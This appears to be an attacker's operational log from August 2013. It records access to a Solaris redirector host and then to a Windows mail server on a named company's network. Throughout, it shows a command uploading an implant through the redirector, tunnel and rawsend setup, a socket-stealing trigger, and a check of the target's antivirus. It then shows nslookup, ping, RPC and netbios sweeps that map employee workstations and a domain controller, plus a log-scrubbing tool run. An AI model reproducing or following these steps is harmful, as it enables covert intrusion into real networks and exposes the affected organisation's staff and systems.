ISP:	LK
City:	
Phone:	
ISP IP:	186.120.114.169
Source IP:	
FINAL target IP:	
Ops Machine:	LOCALHOST.LOCALDOMAIN
Redirecting Method 1:	PITCHIMPAIR
Redirect Host 1:	210.135.90.41
Redirect Target 1:	192.168.1.3


BEGIN UNIX OPNOTES:

Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) : 
--> 210.135.90.41          cnt1.din.or.jp                 pitchimpair          unix      successful    
---> 192.168.1.3           endxbmail001.eastnets.com      jeepflea_market      windows   successful    
Ops Machine: WO
Results:

PROJECT=JEEPFLEA_MARKET
OPUSER=85521
OPSCHEDULE=13082113184448
SCRUBVER=6.007000008


======================= P0
--- 210.135.90.41 --- cnt1
=======================
ourtn -Y5U /current/up/noserver-x86sol2.8 -wBIN 210.135.90.41
2013-08-29 02:44:00 UTC -- on target
2013-08-29 02:46:02 UTC -- w
Uptime: 106 day(s),  0:15:26
2013-08-29 02:57:51 UTC -- tunnels
-tunnel 
l 110 213.132.40.101 110 38951
-rawsend 666


2013-08-29 04:06:03 UTC -- checking some others
-ping 80.227.254.201
 ICMP Reply (80.227.254.201)   195.906 ms    80.227.254.201 >     210.135.90.41 (TTL  51)  
-ping -r 80.227.254.201 -i -p 48600
 ICMP Reply (80.227.254.201)   1.4294166 s    80.227.254.201 >     210.135.90.41 (TTL  51)  
.... no other open ports



2013-08-29 04:27:35 UTC -- another target 80.227.254.202
-ping -r 80.227.254.202 -t -p 2194
80.227.254.202:2194 -> 210.135.90.41:15563 SYN ACK (port 2194 open)
-ping -r 80.227.254.202 -t -p 2443
80.227.254.202:2443 -> 210.135.90.41:15563 SYN ACK (port 2443 open)


2013-08-29 05:39:46 UTC -- preburn checks
2013-08-29 05:39:54 UTC -- bb















LOCALHOST.LOCALDOMAIN: scrubhands v. 6.007000008 20130829-0238
###################
SCRUBHANDS v6.007000008 (suite v6.7.0.08 run in /192.168.254.71) command line:
:
/usr/local/bin/scrubhands -t -S 13082113184448 -I 85521 -P JEEPFLEA_MARKET -n 200.42.213.11,200.42.213.21 186.120.114.169/240/174
###################
Final lines of bwmonitor.txt:
Thu Aug 29 05:43:04 UTC 2013
eth0        bytes      (MB)    packets     kbps    (kBps)   kbps-1m  kbps-10m   kbps-hr
  TX      3429926     (3.3)      13314      0.0     (0.0)       1.3       0.8       0.9
  RX      4484806     (4.3)      12814      0.0     (0.0)       5.0       1.7       1.5

###################################################
PROJECT: jeepflea_market
DATE: 02:42 AM 08/29/2013
OPUSER: 85521
OPSCHEDULE: 13082113184448
#Op Status: Unsuccessful
#Non-Standard: True
###################################################
Targets:



Results:



======================= T1
---   192.168.1.3   --- endxbmail001
=======================
2:58 AM 8/29/2013 --- trigger sent
3:01 AM 8/29/2013 -- failed with only forward tunnel
3:01 AM 8/29/2013 -- trying with rawsend
3:03 AM 8/29/2013 -- hadouken...  socketsteal w/ 110
Uptime: 95 days, 19:0:10
3:10 AM 8/29/2013 --  Kaspersky Endpoint Security 8.1.0.831
3:17 AM 8/29/2013 -- hour clean
3:20 AM 8/29/2013 -- looking for targs
nslookup endxb-kbaluyot     - 192.168.153.144
nslookup kbaluyot           - 10.10.10.118
nslookup managment          - failed
nslookup endjuy             - failed
nslookup endxb-asanghvi     - failed
nslookup asanghvi           - failed
nslookup juy                - 10.10.10.117
nslookup vmailbox2          - 192.168.2.12
nslookup endxb-msyed        - 10.10.10.74 
nslookup msyed              - failed

3:25 AM 8/29/2013 -- scanning 192.168.153.144
ping - failed
rpc 192.168.153.144 1 445   - failed
3:31 AM 8/29/2013 -- scanning some more targs
ping 10.10.10.117
      REPLY from 10.10.10.117 -> 192.168.1.3 -- TTL: 63
netbios -target 10.10.10.117   - failed
rpc 10.10.10.117 1 445         - failed
ping 10.10.10.1                - failed
ping 10.10.10.118              - failed
ping 192.168.2.12              - failed
ping 10.10.10.74               - failed
ping 80.227.254.243            - failed
4:20 AM 8/29/2013 -- trying some fws
banner -ip 80.227.254.201 -tcp -port 2443     - can't reach network
ping 172.16.104.17             - failed


5:12 AM 8/29/2013 -- seeing if they are in
  REPLY from 10.10.10.118 -> 192.168.1.3 -- TTL: 127
netbios -target 10.10.10.118
---------------------------------------------------------------------
ENDXB-COBAS         UNIQUE REGISTERED        Workstation Service
EASTNETS            GROUP REGISTERED         Domain Name
ENDXB-COBAS         UNIQUE REGISTERED        File Server Service
EASTNETS            GROUP REGISTERED         Browser Service Elections

Adapter Address: 00.26.c6.38.98.30
Adapter Type   : Ethernet Adapter

netbios -target 192.168.153.144   - fail
rpc 10.10.10.118 1 445

5:22 AM 8/29/2013 --  netbios -target 10.10.10.23
ENDXB-CALTAKI       UNIQUE REGISTERED        Workstation Service
EASTNETS            GROUP REGISTERED         Domain Name
ENDXB-CALTAKI       UNIQUE REGISTERED        File Server Service
EASTNETS            GROUP REGISTERED         Browser Service Elections

Adapter Address: 9c.b7.0d.17.7b.e6
Adapter Type   : Ethernet Adapter

5:31 AM 8/29/2013 -- netbios -target 192.168.2.10
---------------------------------------------------------------------
VDC04               UNIQUE REGISTERED        Workstation Service
EASTNETS            GROUP REGISTERED         Domain Name
EASTNETS            GROUP REGISTERED         Domain Controller
VDC04               UNIQUE REGISTERED        File Server Service

Adapter Address: 00.0c.29.8d.e3.3a
Adapter Type   : Ethernet Adapter

5:37 AM 8/29/2013